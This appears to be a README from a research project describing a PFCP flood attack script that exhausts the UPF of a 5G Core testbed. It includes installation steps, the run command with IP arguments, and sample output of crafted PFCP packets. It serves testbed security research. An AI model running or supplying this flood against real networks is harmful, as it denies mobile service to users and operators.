# Introduction:

The python script of this directory executes a PFCP flood attack. The script successfully formulates PFCP packets, recognizable by tshark/wireshark, using scapy.

The script has been tested in a dockerized 5G Core testbed. However, it can also be used in a Virtual Machine (VM)-based 5G Core testbed.

With respect to the dockerised 5G core testbed, the script is executed from the Session Management Function (SMF) container targeting the UPF.

A video recording of the attack can be found [here](https://youtu.be/kA59O-HMicA).

This attack has been implemented in the context of the SANCUS H2020 project.  

# Attack Description

The PFCP Flood attack is instanciated from the SMF of the 5G core network.

![SMF.png](./images/SMF.png)

The target of this attack is the UPF, which handles processes and forwards user data to the Data Network (DN).

![UPF.png](./images/UPF.png)

The goal of this flood attack is the exhaustion of the UPF's resources to handle legitimate Session Establishment Requests and Heartbeat Requests. This will potentially hinder the capability of the 5G core to successfully formulate new Protocol Data Unit (PDU) sessions between clients and DN. Essentially, this attack is implemented on the N4 interface, and the impact can be observed in the intermediate interfaces. The Session ID (SEID) is randomized for each session establishment request.

![impact.png](./images/impact.png)

# Requirements

In general, this attack script only requires scapy and faker. The following steps summarize the installation of the aforementioned python libraries.

Step 1: Update and Refresh Repository Lists

`sudo apt update`

Step 2: Install supporting software

`sudo apt install software-properties-common`

Step 3: Add Deadsnakes PPA

`sudo add-apt-repository ppa:deadsnakes/ppa`

`sudo apt update`

Step 4: Install python

`sudo apt install python3.8`

Step 5: Check python3 version

`python3 --version`

Step 6: Install pip3

`sudo apt install python3-pip -y`

Step 7: Install scapy 

`pip3 install scapy`

Step 8: Install "faker" library

`pip3 install faker`

# Attack Execution and Parameters
The following parameters are utilised by the script:

**1. PFCP_CP_IP_V4:** The IPv4 address of the PFCP control plain (SMF). This parameter is provided as a command-line argument.

**2. PFCP_UP_IP_V4:** The IPv4 address of the PFCP user plain (UPF). This parameter is provided as a command-line argument.

**3. N3_IP_V4:** The IPv4 address of the N3 interface network. This parameter is provided as a command-line argument.

**4. GNB_IP_V4:** The IPv4 address of the gNB. This parameter is provided as a command-line argument.

**5. UE_IP_V4**: The IPv4 address of the UE. This parameter is currently generated randomly, along with the Session ID.

The required parameters can be passed into the script as arguments.

The sole file to implement this attack is the **pfcp-Flood.py** script.

Please navigate to the directory containing the file and execute it with sudo privileges whilst providing the required arguments:

`sudo python3 pfcp-Flood.py <PFCP_CP_IP_V4> <PFCP_UP_IP_V4> <N3_IP_V4> <GNB_IP_V4>`

E.g.,:

`sudo python3 pfcp-Flood.py 192.187.3.3 192.187.3.6 192.187.3.0 193.187.3.253`

The output of the command will be:

```
~$sudo python3 pfcp-Flood.py 192.187.3.3 192.187.3.6 192.187.3.0 193.187.3.253
Starting traffic generation with the following parameters:

PFCP_CP_IP_V4 = 192.187.3.3
PFCP_UP_IP_V4 = 192.187.3.6
N3_IP_V4 = 192.187.3.0
GNB_IP_V4 = 193.187.3.253

UE IP address and SEID are randomly generated

Press Enter to continue...

2022-04-28 20:22:20,134 - __main__ - INFO - REQ: <PFCPHeartbeatRequest  IE_list=[<IE_RecoveryTimeStamp  timestamp=3860166140 |>] |>
.
Sent 1 packets.
2022-04-28 20:22:20,224 - __main__ - INFO - REQ: <PFCPSessionEstablishmentRequest  IE_list=[<IE_CreateFAR  IE_list=[<IE_ApplyAction  FORW=1 |>, <IE_FAR_Id  id=1 |>] |>, <IE_CreatePDR  IE_list=[<IE_FAR_Id  id=1 |>, <IE_PDI  IE_list=[<IE_NetworkInstance  instance='access' |>, <IE_SDF_Filter  FD=1 flow_description='permit out ip from any to assigned' |>, <IE_SourceInterface  interface=Access |>, <IE_UE_IP_Address  SD=0 V4=1 ipv4=45.45.0.4 |>, <IE_FTEID  V4=1 TEID=0x457 ipv4=193.187.3.0 |>] |>, <IE_PDR_Id  id=1 |>, <IE_Precedence  precedence=200 |>, <IE_OuterHeaderRemoval  |>] |>, <IE_CreateFAR  IE_list=[<IE_ApplyAction  FORW=1 |>, <IE_FAR_Id  id=2 |>, <IE_ForwardingParameters  IE_list=[<IE_DestinationInterface  interface=Access |>, <IE_NetworkInstance  instance='n6' |>, <IE_OuterHeaderCreation  GTPUUDPIPV4=1 TEID=0x8ae ipv4=193.187.3.253 |>] |>] |>, <IE_CreatePDR  IE_list=[<IE_FAR_Id  id=2 |>, <IE_PDI  IE_list=[<IE_NetworkInstance  instance='n6' |>, <IE_SourceInterface  interface=Core |>, <IE_UE_IP_Address  SD=1 V4=1 ipv4=45.45.0.4 |>] |>, <IE_PDR_Id  id=2 |>, <IE_Precedence  precedence=200 |>, <IE_OuterHeaderRemoval  |>] |>, <IE_FSEID  v4=1 seid=0x82167cb35b03e373 ipv4=192.187.3.3 |>, <IE_NodeId  id_type=FQDN id='cp' |>] |>
.
Sent 1 packets.
2022-04-28 20:22:20,272 - __main__ - INFO - REQ: <PFCPHeartbeatRequest  IE_list=[<IE_RecoveryTimeStamp  timestamp=3860166140 |>] |>
.
...
```

Through wireshark, we can observe that all packets are formatted appropriately and contain unique and random SEIDs, and UE IP addresses.

![wireshark-01.png](./images/wireshark-01.png)

![wireshark-02.png](./images/wireshark-02.png)
